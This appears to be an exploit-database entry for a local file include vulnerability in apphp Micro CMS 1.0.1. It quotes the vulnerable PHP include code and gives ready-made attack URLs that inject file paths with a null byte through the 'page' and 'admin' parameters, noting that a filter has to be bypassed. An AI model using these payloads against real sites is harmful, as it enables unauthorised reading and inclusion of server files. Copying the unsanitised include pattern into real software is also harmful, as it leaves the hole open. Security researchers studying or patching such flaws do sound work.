apphp Micro Cms 1.0.1 Local File Include Vulnerability

2014-05-29T00:00:00
ID 1337DAY-ID-22289
Type zdt
Reporter JiKo
Modified 2014-05-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ----------[exploit Debut]

[Local File Include Vulnerability]

----------[Author Info]

 

Name : JIKO

 

----------[Script Info]

 

Site        : http://www.supersimple.org/

Download    : http://www.apphp.com/downloads_free/php_microcms_101.zip

Name        : Micro Cms

Version        : 1.0.1

 

----------[exploit Info]

 



~[LFI]

http://path/index.php?index.php?page=FILE%00 (you need to baypass the filter)

http://path/index.php?index.php?admin=FILE%00 (you need to baypass the filter)



if (($page != "") && file_exists("page/" . $page . ".php")) {

                        include_once("page/" . $page .



".php");

                    } else if (($admin != "") &&



file_exists("admin/" . $admin . ".php")) {

                        include_once("admin/" . $admin



. ".php");

                    }

------------------------------------------------------------------

#  0day.today [2018-01-04]  #